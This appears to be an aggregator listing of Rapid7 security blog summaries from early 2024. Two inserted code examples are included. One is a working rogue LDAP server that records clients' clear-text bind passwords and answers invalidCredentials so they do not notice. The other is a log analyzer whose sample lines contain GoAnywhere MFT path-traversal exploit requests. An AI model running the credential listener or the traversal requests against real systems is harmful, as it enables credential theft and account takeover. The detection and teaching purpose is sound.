Rapid7 Blog (recent)

1723 matches found

Rapid7 Blog
added 2024/03/20 10:00 p.m. | 38 views

The Updated APT Playbook: Tales from the Kimsuky threat actor group

Co-authors: Christiaan Beek and Raj Samani. Within Rapid7 Labs we continually track and monitor threat groups. This is one of our key areas of focus as we work to ensure that our ability to protect customers remains constant. As part of this process, we routinely identify evolving tactics from...

AI score: 7.8
Exploits: 0
Rapid7 Blog
added 2024/03/18 2:30 p.m. | 32 views

Rapid7 offers continued vulnerability coverage in the face of NVD delays

Recently, the US National Institute of Standards and Technology (NIST) announced on the National Vulnerability Database (NVD) site that there would be delays in adding information on newly published CVEs. NVD enriches CVEs with basic details about a vulnerability like the vulnerability’s CVSS score,...

CVSS: 6.8 | AI score: 8.8 | EPSS: 0.02043
Exploits: 0
Rapid7 Blog
added 2024/03/15 6:20 p.m. | 59 views

Metasploit Wrap-Up 03/15/2024

New module content (3)

GitLab Password Reset Account Takeover
Authors: asterion04 and h00die
Type: Auxiliary
Pull request: 18716 contributed by h00die
Path: admin/http/gitlab_password_reset_account_takeover
AttackerKB reference: CVE-2023-7028
Description: This adds an exploit module that leverages an...

CVSS: 7.5 | AI score: 8.7 | EPSS: 0.99938
Exploits: 53
Rapid7 Blog
added 2024/03/14 3:24 p.m. | 20 views

Rapid7’s Ciara Cullinan Recognized as Community Trailblazer in Belfast Awards Program

At the 2024 Women Who Code She Rocks Awards, Rapid7 Software Engineer II Ciara Cullinan was recognized with their ‘Community Trailblazer’ award. According to Women Who Code, “This award celebrates the efforts of someone who brings people together and creates genuine connections in our tech...

AI score: 7.1
Exploits: 0
Rapid7 Blog
added 2024/03/12 7:47 p.m. | 118 views

Patch Tuesday - March 2024

Microsoft is addressing 60 vulnerabilities this March 2024 Patch Tuesday. Microsoft indicated that they aren’t aware of prior public disclosure or exploitation in the wild for any of the vulnerabilities patched today, which means no new additions to CISA KEV at time of writing. Microsoft is...

CVSS: 7.5 | AI score: 9.6 | EPSS: 0.30504
Exploits: 3
Rapid7 Blog
added 2024/03/08 5:00 p.m. | 90 views

Metasploit Wrap-Up 03/08/2024

New module content (2)

GitLab Tags RSS feed email disclosure
Authors: erruquill and n00bhaxor
Type: Auxiliary
Pull request: 18821 contributed by n00bhaxor
Path: gather/gitlab_tags_rss_feed_email_disclosure
AttackerKB reference: CVE-2023-5612
Description: This adds an auxiliary module that leverages an...

CVSS: 7.5 | AI score: 6 | EPSS: 0.99753
Exploits: 27
Rapid7 Blog
added 2024/03/07 6:04 p.m. | 31 views

Securing the Next Level: Automated Cloud Defense in Game Development with InsightCloudSec

Imagine the following scenario: You're about to enjoy a strategic duel on chess.com or dive into an intense battle in Fortnite, but as you log in, you find your hard-earned achievements, ranks, and reputation have vanished into thin air. This is not just a hypothetical scenario but a real...

AI score: 7.2
Exploits: 0
Rapid7 Blog
added 2024/03/05 1:45 p.m. | 19 views

7 Rapid Questions with #77 Ray Bourque

We couldn’t pass up the opportunity to bring Boston Bruins legend Ray Bourque into the herd as we continue to expand our Bruins jersey sponsorship. Ray is an absolute hero to Bruins fans everywhere. He has cemented his status in the annals of Boston sports history through 21 seasons in the black...

AI score: 6.9
Exploits: 0
Rapid7 Blog
added 2024/03/04 9:34 p.m. | 12 views

Lessons from video game companies: automation unleashes robust monitoring & observability

Video game organizations need robust monitoring and observability solutions to stay one step ahead of cyber adversaries. Chances are, so do we all. In this blog post, we’ll delve into how monitoring and observability capabilities enable video game organizations to bolster their cybersecurity...

AI score: 7.2
Exploits: 0
Rapid7 Blog
added 2024/03/04 7:17 p.m. | 5 views

CVE-2024-27198 and CVE-2024-27199: JetBrains TeamCity Multiple Authentication Bypass Vulnerabilities (FIXED)

Overview: In February 2024, Rapid7’s vulnerability research team identified two new vulnerabilities affecting JetBrains TeamCity CI/CD server: CVE-2024-27198 is an authentication bypass vulnerability in the web component of TeamCity that arises from an alternative path issue (CWE-288) and has a CVSS...

CVSS: 9.8 | AI score: 10 | EPSS: 0.99991
Exploits: 25
Rapid7 Blog
added 2024/03/01 8:00 p.m. | 45 views

Metasploit Weekly Wrap-Up 03/01/2024

Connect the dots from authentication bypass to remote code execution: This week, our very own sfewer-r7 added a new exploit module that leverages an authentication bypass vulnerability in ConnectWise ScreenConnect to achieve remote code execution. This vulnerability, CVE-2024-1709, affects all...

CVSS: 7.5 | AI score: 9 | EPSS: 0.99959
Exploits: 8
Rapid7 Blog
added 2024/02/29 5:32 p.m. | 63 views

How To Hunt For UEFI Malware Using Velociraptor

UEFI threats have historically been limited in number and mostly implemented by nation state actors as stealthy persistence. However, the recent proliferation of Black Lotus on the dark web, Trickbot enumeration module (late 2022), and Glupteba (November 2023) indicates that this historical trend may...

CVSS: 4.9 | AI score: 6.9 | EPSS: 0.06567
Exploits: 1
Rapid7 Blog
added 2024/02/23 5:50 p.m. | 61 views

Metasploit Weekly Wrap-Up 02/23/2024

LDAP Capture module: Metasploit now has an LDAP capture module thanks to the work of JustAnda7. This work was completed as part of the Google Summer of Code program. When the module runs it will by default require privileges to listen on port 389. The module implements a default implementation for...

CVSS: 7.5 | AI score: 9.8 | EPSS: 0.99999
Exploits: 40
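Added example (not Metasploit's module and not code from the wrap-up) of what an LDAP capture service fundamentally does: it BER-decodes the client's BindRequest (RFC 4511), records the DN and the clear-text password of a simple bind, and answers invalidCredentials so the client learns nothing and moves on. The encoder exists only to produce test traffic; the DN and password used in testing are constructed, and the listener defaults (0.0.0.0, port 389) are this example's choices, not the module's options.

```python
import socket
from dataclasses import dataclass
from typing import Optional

# BER tags used by LDAPMessage / BindRequest / BindResponse (RFC 4511)
TAG_SEQUENCE, TAG_INTEGER, TAG_OCTET_STRING, TAG_ENUMERATED = 0x30, 0x02, 0x04, 0x0A
TAG_BIND_REQUEST, TAG_BIND_RESPONSE = 0x60, 0x61  # [APPLICATION 0] / [APPLICATION 1]
TAG_AUTH_SIMPLE = 0x80                             # [0] primitive: the clear-text password

def _read_tlv(buf: bytes, pos: int):
    """(tag, value, next_pos) of the BER element at buf[pos]; raises if truncated."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                     # long form: low 7 bits = count of length octets
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    if pos + length > len(buf):
        raise ValueError("truncated LDAP element")
    return tag, buf[pos:pos + length], pos + length

def _tlv(tag: int, value: bytes) -> bytes:
    n = len(value)
    if n < 0x80:
        return bytes([tag, n]) + value
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + value

def _int(n: int) -> bytes:
    return _tlv(TAG_INTEGER, n.to_bytes((n.bit_length() + 8) // 8, "big", signed=True))

@dataclass
class BindCapture:
    message_id: int
    version: int
    dn: str
    password: Optional[str]  # None when the client chose SASL rather than simple auth

def parse_bind_request(pdu: bytes) -> Optional[BindCapture]:
    """Decode one LDAPMessage; return the capture, or None if it is not a BindRequest."""
    tag, msg, _ = _read_tlv(pdu, 0)
    if tag != TAG_SEQUENCE:
        raise ValueError("not an LDAPMessage")
    _, mid, pos = _read_tlv(msg, 0)          # messageID INTEGER
    tag, op, _ = _read_tlv(msg, pos)         # protocolOp CHOICE
    if tag != TAG_BIND_REQUEST:
        return None
    vtag, ver, pos = _read_tlv(op, 0)
    ntag, name, pos = _read_tlv(op, pos)
    atag, auth, _ = _read_tlv(op, pos)
    if (vtag, ntag) != (TAG_INTEGER, TAG_OCTET_STRING):
        raise ValueError("malformed BindRequest")
    password = auth.decode("utf-8", "replace") if atag == TAG_AUTH_SIMPLE else None
    return BindCapture(int.from_bytes(mid, "big", signed=True),
                       int.from_bytes(ver, "big", signed=True),
                       name.decode("utf-8", "replace"), password)

def build_simple_bind(message_id: int, dn: str, password: str, version: int = 3) -> bytes:
    """Encode a BindRequest as a client would (used here only to produce test traffic)."""
    body = _int(version) + _tlv(TAG_OCTET_STRING, dn.encode()) + _tlv(TAG_AUTH_SIMPLE, password.encode())
    return _tlv(TAG_SEQUENCE, _int(message_id) + _tlv(TAG_BIND_REQUEST, body))

def build_bind_response(message_id: int, result_code: int = 49) -> bytes:
    """BindResponse (default resultCode 49 = invalidCredentials) with empty matchedDN/diagnosticMessage."""
    body = _tlv(TAG_ENUMERATED, bytes([result_code])) + _tlv(TAG_OCTET_STRING, b"") * 2
    return _tlv(TAG_SEQUENCE, _int(message_id) + _tlv(TAG_BIND_RESPONSE, body))

def _recv_exact(conn: socket.socket, n: int) -> bytes:
    data = b""
    while len(data) < n:
        chunk = conn.recv(n - len(data))
        if not chunk:
            raise ConnectionError("peer closed mid-message")
        data += chunk
    return data

def _recv_message(conn: socket.socket) -> bytes:
    """Read exactly one LDAPMessage, sizing the read from its outer BER length."""
    head = _recv_exact(conn, 2)
    length = head[1]
    if length & 0x80:
        extra = _recv_exact(conn, length & 0x7F)
        head, length = head + extra, int.from_bytes(extra, "big")
    return head + _recv_exact(conn, length)

def capture_once(host: str = "0.0.0.0", port: int = 389) -> Optional[BindCapture]:
    """Accept one client, record its simple bind, reply invalidCredentials (389 needs root/CAP_NET_BIND_SERVICE)."""
    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((host, port))
        srv.listen(1)
        conn, peer = srv.accept()
        with conn:
            cap = parse_bind_request(_recv_message(conn))
            if cap is not None:
                conn.sendall(build_bind_response(cap.message_id))
                print(f"[+] {peer[0]} bind dn={cap.dn!r} password={cap.password!r}")
            return cap
```

Run `capture_once(port=3890)` as an unprivileged user and point any LDAP client at it (for instance `ldapwhoami -x -H ldap://127.0.0.1:3890 -D cn=test -w secret`); the simple bind's DN and password are printed before the client is told the login failed. SASL binds are recorded with `password=None`, since the credential never crosses the wire in clear text.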
Rapid7 Blog
added 2024/02/20 8:03 p.m. | 57 views

High-Risk Vulnerabilities in ConnectWise ScreenConnect

On February 19, 2024 ConnectWise disclosed two vulnerabilities in their ScreenConnect remote access software. Both vulnerabilities affect ScreenConnect 23.9.7 and earlier. Neither vulnerability had a CVE assigned at time of disclosure, but as of February 21, CVEs have been assigned to both issues...

CVSS: 7.5 | AI score: 9.7 | EPSS: 0.99959
Exploits: 9
Rapid7 Blog
added 2024/02/20 5:03 p.m. | 53 views

Explanation of New Authenticated Scanning PCI DSS Requirement 11.3.1.2 in PCI DSS V4.0 and how InsightVM can help meet the Requirement

By: Dominick Vitolo, VP of Security Services, MegaplanIT. As a Certified Qualified Security Assessor (QSA) company and a trusted Rapid7 partner, MegaplanIT is committed to guiding organizations through the complexities of compliance and security standards. PCI DSS version 4.0 is a significant update...

AI score: 7
Exploits: 0
Rapid7 Blog
added 2024/02/16 8:34 p.m. | 28 views

Metasploit Weekly Wrap-Up 02/16/2024

New Fetch Payload: It has been almost a year since Metasploit released the new fetch payloads and since then, 43 of the 79 exploit modules have had support for fetch payloads. The original payloads supported transferring the second stage over HTTP, HTTPS and FTP. This week, Metasploit has expanded...

AI score: 7.3
Exploits: 0
Rapid7 Blog
added 2024/02/15 7:38 p.m. | 53 views

RCE to Sliver: IR Tales from the Field

Rapid7 Incident Response consultants Noah Hemker, Tyler Starks, and malware analyst Tom Elkins contributed analysis and insight to this blog. Rapid7 Incident Response was engaged to investigate an incident involving unauthorized access to two publicly-facing Confluence servers that were the sourc...

CVSS: 7.5 | AI score: 8.6 | EPSS: 0.99984
Exploits: 31
Rapid7 Blog
added 2024/02/14 2:00 p.m. | 9 views

Paving a Path to Systems Administration: Naeem Jones’ Journey with Rapid7

Prior to becoming a Systems Administrator at Rapid7, Naeem Jones entered his career in cybersecurity through the Hack.Diversity program. Hack.Diversity is a program that connects talented Black and Latin/x students and early-career professionals with organizations that are looking to build...

AI score: 7.2
Exploits: 0
Rapid7 Blog
added 2024/02/13 9:26 p.m. | 126 views

Patch Tuesday - February 2024

Microsoft is addressing 73 vulnerabilities this February 2024 Patch Tuesday, including two (actually, three!) zero-day/exploited-in-the-wild vulnerabilities, both of which are already included on the CISA KEV list. Today also brings patches for two critical remote code execution (RCE) vulnerabilities...

CVSS: 7.5 | AI score: 10 | EPSS: 0.99995
Exploits: 40
Rapid7 Blog
added 2024/02/13 4:00 p.m. | 5 views

CVE-2023-47218: QNAP QTS and QuTS Hero Unauthenticated Command Injection (FIXED)

Rapid7 has identified an unauthenticated command injection vulnerability in the QNAP operating system known as QTS and QuTS hero. QTS is a core part of the firmware for numerous QNAP entry- and mid-level Network Attached Storage (NAS) devices, and QuTS hero is a core part of the firmware for numero...

CVSS: 8.3 | AI score: 6.9 | EPSS: 0.89157
Exploits: 4
Rapid7 Blog
added 2024/02/12 1:23 p.m. | 140 views

Critical Fortinet FortiOS CVE-2024-21762 Exploited

On February 8, 2024 Fortinet disclosed multiple critical vulnerabilities affecting FortiOS, the operating system that runs on Fortigate SSL VPNs. The critical vulnerabilities include CVE-2024-21762, an out-of-bounds write vulnerability in SSLVPNd that could allow remote unauthenticated attackers ...

CVSS: 7.5 | AI score: 8.6 | EPSS: 0.99474
Exploits: 29
Rapid7 Blog
added 2024/02/09 7:35 p.m. | 50 views

Metasploit Weekly Wrap-Up 02/09/2024

Go go gadget Fortra GoAnywhere MFT Module: This Metasploit release contains a module for one of 2024's hottest vulnerabilities to date: CVE-2024-0204. The path traversal vulnerability in Fortra GoAnywhere MFT allows for unauthenticated attackers to access the InitialAccountSetup.xhtml endpoint whi...

CVSS: 7.5 | AI score: 8.6 | EPSS: 0.95086
Exploits: 13
Rapid7 Blog
added 2024/02/07 3:59 p.m. | 19 views

5 Insights from the Latest Cybersecurity Trends Research

Rapid7 is committed to promoting research that identifies the latest cybersecurity trends so that organizations can leverage these insights and create programs that make sense for the modern SOC. To that end, we’ve singled out five quick insights security professionals and stakeholders should...

AI score: 7.3
Exploits: 0
Rapid7 Blog
added 2024/02/06 6:00 p.m. | 21 views

Celebrating Excellence: Alex Page Recognized As a CRN 2024 Channel Chief

Congratulations to Rapid7’s Vice President of Global Channel Sales, Alex Page, who is named among the newly-announced CRN 2024 Channel Chiefs! Alex, who also received this prestigious accolade in 2023, has been recognized for his outstanding contributions and expertise in driving strategic...

AI score: 7.1
Exploits: 0
Rapid7 Blog
added 2024/02/06 2:00 p.m. | 14 views

Four Key Benefits of Rapid7’s New Managed Digital Risk Protection Service

Cybercrime has boomed to the third largest economy in the world behind the US and China (Cybernews), with much of the most nefarious behavior on the dark web. Monitoring it effectively can be the key to identifying the earliest signals of an attack – and the difference between a minor event and a...

AI score: 7
Exploits: 0
Rapid7 Blog
added 2024/02/05 7:08 p.m. | 400 views

Exploring the (Not So) Secret Code of Black Hunt Ransomware

It seems like every week, the cybersecurity landscape sees the emergence of yet another ransomware variant, with Black Hunt being one of the latest additions. Initially reported by cybersecurity researchers in 2022, this new threat has quickly made its presence known. In a recent incident, Black...

AI score: 8.2
Exploits: 0
Rapid7 Blog
added 2024/02/02 8:14 p.m. | 50 views

Metasploit Weekly Wrap-Up 02/02/2024

Shared RubySMB Service Improvements: This week’s updates include improvements to Metasploit Framework’s SMB server implementation: the SMB server can now be reused across various SMB modules, which are now able to register their own unique shares and files. SMB modules can also now be executed...

CVSS: 7.5 | AI score: 9.6 | EPSS: 0.97106
Exploits: 22
Rapid7 Blog
added 2024/02/02 4:08 p.m. | 20 views

Rapid7 in Prague: Pete Rubio Shares Insights and Excitement for the New Office

As we continue to grow our customer base here at Rapid7, we’re growing our offices as well – this time with a new location in the Czech Republic. With a successful history of building innovation hubs from Boston to Belfast, our teams can’t wait to bring new talent from Prague into the business...

AI score: 6.9
Exploits: 0
Rapid7 Blog
added 2024/01/31 5:05 p.m. | 21 views

InsightAppSec: Improving Scan Speed and Performance

When scanning a web application in InsightAppSec, you might see it take several hours, if not several days, to run. This can be due to the size of your web app, but plenty of settings in your scan configuration can be modified to help scans complete faster. The first setting is Info - Enable...

AI score: 7
Exploits: 0
Rapid7 Blog
added 2024/01/26 9:12 p.m. | 72 views

Metasploit Weekly Wrap-Up 01/26/24

Direct Syscalls Support for Windows Meterpreter: Direct system calls are a well-known technique that is often used to bypass EDR/AV detection. This technique is particularly useful when dynamic analysis is performed, where the security software monitors every process on the system to detect any...

CVSS: 7.5 | AI score: 10 | EPSS: 0.99999
Exploits: 102
Rapid7 Blog
added 2024/01/25 2:58 p.m. | 10 views

Building the Best SOC Takes Strategic Thinking

So your security team is ready to scale up its security operations center, or SOC, to better meet the security needs of your organization. That’s great news. But there are some very important strategic questions that need to be answered if you want to build the most effective SOC you can and avoi...

AI score: 7.1
Exploits: 0
Rapid7 Blog
added 2024/01/23 6:42 p.m. | 85 views

CVE-2024-0204: Critical Authentication Bypass in Fortra GoAnywhere MFT

On January 22, 2024, Fortra published a security advisory on CVE-2024-0204, a critical authentication bypass affecting its GoAnywhere MFT secure managed file transfer product prior to version 7.4.1. The vulnerability is remotely exploitable and allows an unauthorized user to create an admin user...

CVSS: 7.5 | AI score: 7.6 | EPSS: 0.99999
Exploits: 20
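Added example serving both the 02/09 Metasploit wrap-up above (path traversal to the InitialAccountSetup.xhtml endpoint) and this advisory entry; it is not Rapid7's, Fortra's or Metasploit's code. It normalizes request targets from web access logs the way a servlet container does: per-segment path parameters (";...") are stripped before "." and ".." are resolved, so the publicly documented "/..;/" form, which a naive prefix filter treats as a literal directory name, is reduced to the same path as "/../". Any request that traverses, or that resolves to the setup-wizard page a finished install should never serve, is reported. The log lines, IP addresses and the SENSITIVE_SUFFIXES list are constructed for this example.

```python
import re
from urllib.parse import unquote

# Common log format; only the fields used below are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3})'
)

# Endpoints a completed install should never serve again (constructed list;
# the GoAnywhere MFT setup wizard page is the one named in the advisory).
SENSITIVE_SUFFIXES = ("/wizard/InitialAccountSetup.xhtml",)


def normalize_path(target: str) -> tuple:
    """Collapse a request target the way a servlet container does.

    Returns (normalized_path, traversal_seen). Path parameters are dropped
    from each segment before "." and ".." are resolved, so "/images/..;/wizard"
    and "/images/../wizard" both become "/wizard".
    """
    path = target.split("?", 1)[0]
    for _ in range(2):                 # two rounds also catch double URL-encoding
        path = unquote(path)
    out, traversal = [], False
    for seg in path.split("/"):
        seg = seg.split(";", 1)[0]     # ";jsessionid=..." and "..;" both lose their tail
        if seg in ("", "."):
            continue
        if seg == "..":
            traversal = True
            if out:
                out.pop()
            continue
        out.append(seg)
    return "/" + "/".join(out), traversal


def analyze(lines):
    """One finding per log line that traverses or resolves to a sensitive endpoint."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        norm, traversal = normalize_path(m["target"])
        sensitive = norm.endswith(SENSITIVE_SUFFIXES)
        if traversal or sensitive:
            findings.append({
                "ip": m["ip"], "method": m["method"], "status": int(m["status"]),
                "raw": m["target"], "normalized": norm,
                "traversal": traversal, "sensitive": sensitive,
            })
    return findings


# Constructed sample: two requests using the "..;" form, one double-encoded,
# one ordinary login page hit, one benign path parameter on a static file.
SAMPLE_LOG = [
    '203.0.113.5 - - [22/Jan/2024:10:15:01 +0000] "GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1" 200 5120',
    '203.0.113.5 - - [22/Jan/2024:10:15:03 +0000] "POST /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1" 302 0',
    '203.0.113.9 - - [22/Jan/2024:10:15:30 +0000] "GET /goanywhere/images/%252e%252e;/wizard/InitialAccountSetup.xhtml HTTP/1.1" 200 5120',
    '198.51.100.7 - - [22/Jan/2024:10:16:00 +0000] "GET /goanywhere/auth/Login.xhtml HTTP/1.1" 200 2048',
    '198.51.100.7 - - [22/Jan/2024:10:17:00 +0000] "GET /goanywhere/images/logo.png;jsessionid=ABC123 HTTP/1.1" 200 1410',
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"{f['ip']} {f['method']} {f['status']} {f['raw']} -> {f['normalized']}")
```

A POST to the wizard page that returns a redirect, as in the second sample line, is the shape to treat as a probable successful account creation rather than a scan; a plain request for the wizard page with no traversal would still be reported through the `sensitive` flag alone.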
Rapid7 Blog
added 2024/01/19 9:36 p.m. | 49 views

Metasploit Weekly Wrap-Up 01/19/24

Unicode your way to a php payload and three modules to add to your playbook for Ansible: Our own jheysel-r7 added an exploit leveraging the fascinating tool of php filter chaining to prepend a payload using encoding conversion characters, and h00die et al. have come through and added 3 new Ansible...

CVSS: 7.5 | AI score: 7 | EPSS: 0.97846
Exploits: 14
Rapid7 Blog
added 2024/01/19 3:40 p.m. | 83 views

Critical CVEs in Outdated Versions of Atlassian Confluence and VMware vCenter Server

Rapid7 is highlighting two critical vulnerabilities in outdated versions of widely deployed software this week. Atlassian disclosed CVE-2023-22527, a template injection vulnerability in Confluence Server with a maxed-out CVSS score of 10, while VMware pushed a fresh update to its October 2023...

CVSS: 10 | AI score: 10 | EPSS: 0.99999
Exploits: 121
Rapid7 Blog
added 2024/01/18 6:00 p.m. | 15 views

Privacy, Security, and Connected Devices: Key Takeaways From CES 2024

The topic of data privacy has become so relevant in our age of smart technology. With everything becoming connected, including our homes, workplaces, cities, and even our cars, those who develop this technology are obligated to identify consumers' expectations for privacy and then find the best...

AI score: 7.4
Exploits: 0
Rapid7 Blog
added 2024/01/18 2:00 p.m. | 10 views

How CISOs’ Roles – and Security Operations – Will Change in 2024

It’s fair to say that 2023 was a turning point for the cybersecurity industry, and no one felt it more than the CISO. From the onslaught of ransomware and zero-day attacks, to the SEC’s new reporting rules, and added to technological innovation and sprawl, CISOs have never been under more pressur...

AI score: 7.5
Exploits: 0
Rapid7 Blog
added 2024/01/17 8:32 p.m. | 35 views

Whispers of Atlantida: Safeguarding Your Digital Treasure

Recently, Rapid7 observed a new stealer named Atlantida. The stealer tricks users to download a malicious file from a compromised website, and uses several evasion techniques such as reflective loading and injection before the stealer is loaded. Atlantida steals a wide range of login information ...

AI score: 7.3
Exploits: 0
Rapid7 Blog
added 2024/01/16 4:00 p.m. | 9 views

Application Security Posture Management

Accelerating the Remediation of Vulnerabilities From Code To Cloud
Written by Eric Sheridan, Chief Innovation Officer, Tromzo
In this guest blog post by Eric Sheridan, Chief Innovation Officer at valued Rapid7 partner Tromzo, you’ll learn how Rapid7 customers can utilize ASPM solutions to...

AI score: 6.7
Exploits: 0
Rapid7 Blog
added 2024/01/12 9:25 p.m. | 44 views

Metasploit Weekly Wrap-Up 01/12/24

New module content (1)

Windows Gather Mikrotik Winbox "Keep Password" Credentials Extractor
Author: Pasquale 'sid' Fiorillo
Type: Post
Pull request: 18604 contributed by siddolo
Path: windows/gather/credentials/winbox_settings
Description: This pull request introduces a new post module to extract th...

CVSS: 7.5 | AI score: 7.3 | EPSS: 0.99753
Exploits: 15
Rapid7 Blog
added 2024/01/12 2:00 p.m. | 15 views

2023 Ransomware Stats: A Look Back To Plan Ahead

Last year was not a year for the faint of heart. Organizations of every size found themselves faced with ransomware attacks at varying levels of sophistication, yet every one of them was damaging. And as we step into 2024, the first victims of ransomware attacks are already being reported. What c...

AI score: 6.9
Exploits: 0
Rapid7 Blog
added 2024/01/11 3:00 p.m. | 13 views

4 Questions for CISOs to Reduce Threat Exposure Risk

In an ongoing effort to help security organizations gain greater visibility into threat exposure risk, we have determined four key questions every CISO should be considering based on our understanding of the recommendations of a new report from Gartner®. The report, 2024 Strategic Roadmap for...

AI score: 7.3
Exploits: 0
Rapid7 Blog
added 2024/01/11 1:00 p.m. | 84 views

Zero-Day Exploitation of Ivanti Connect Secure and Policy Secure Gateways

Information on these vulnerabilities has evolved considerably since this blog was originally published on January 11, 2024. Customers should refer to Ivanti's two advisories, KB article, and recovery guidance for the latest updates. On Wednesday, January 10, 2024, Ivanti disclosed two zero-day...

CVSS: 6.5 | AI score: 10 | EPSS: 0.99999
Exploits: 26
Rapid7 Blog
added 2024/01/09 9:23 p.m. | 187 views

Patch Tuesday - January 2024

Microsoft is addressing 49 vulnerabilities this January 2024 Patch Tuesday, including a single critical remote code execution vulnerability. Four browser vulnerabilities were published separately this month, and are not included in the total. No zero-day vulnerabilities are published or patched...

CVSS: 7.5 | AI score: 9.8 | EPSS: 0.99618
Exploits: 20
Rapid7 Blog
added 2024/01/05 6:48 p.m. | 38 views

Metasploit Weekly Wrap-Up 1/05/2024

New module content (2)

Splunk raw Server Info Disclosure
Authors: KOF2002, h00die, and n00bhaxor
Type: Auxiliary
Pull request: 18635 contributed by n00bhaxor
Path: gather/splunk_raw_server_info
Description: This PR adds a module for an authenticated Splunk information disclosure vulnerability. This...

CVSS: 7.5 | AI score: 9.3 | EPSS: 0.92918
Exploits: 10
Rapid7 Blog
added 2024/01/05 5:24 p.m. | 25 views

Rapid7’s Data-Centric Approach to AI in Belfast

Authored by Stuart Millar and Ryan Wilson. Rapid7 has expanded significantly in Belfast since establishing a presence back in 2014, resulting in the company's largest R&D hub outside the US with over 350 people spread across eight floors in our Chichester Street office. There is a wide range of...

AI score: 7
Exploits: 0
Rapid7 Blog
added 2024/01/04 4:00 p.m. | 18 views

Rapid7 Recognized by Newsweek as one of ‘America’s Greatest Workplaces for Diversity for 2024’

On December 13th, Newsweek Magazine published their list of ‘America’s Greatest Workplaces for Diversity for 2024’. Like many companies today, Rapid7 recognizes the positive impact diversity plays in driving organizational success, attracting and retaining exceptional talent, and creating positiv...

AI score: 6.9
Exploits: 0
Total number of security vulnerabilities: 1723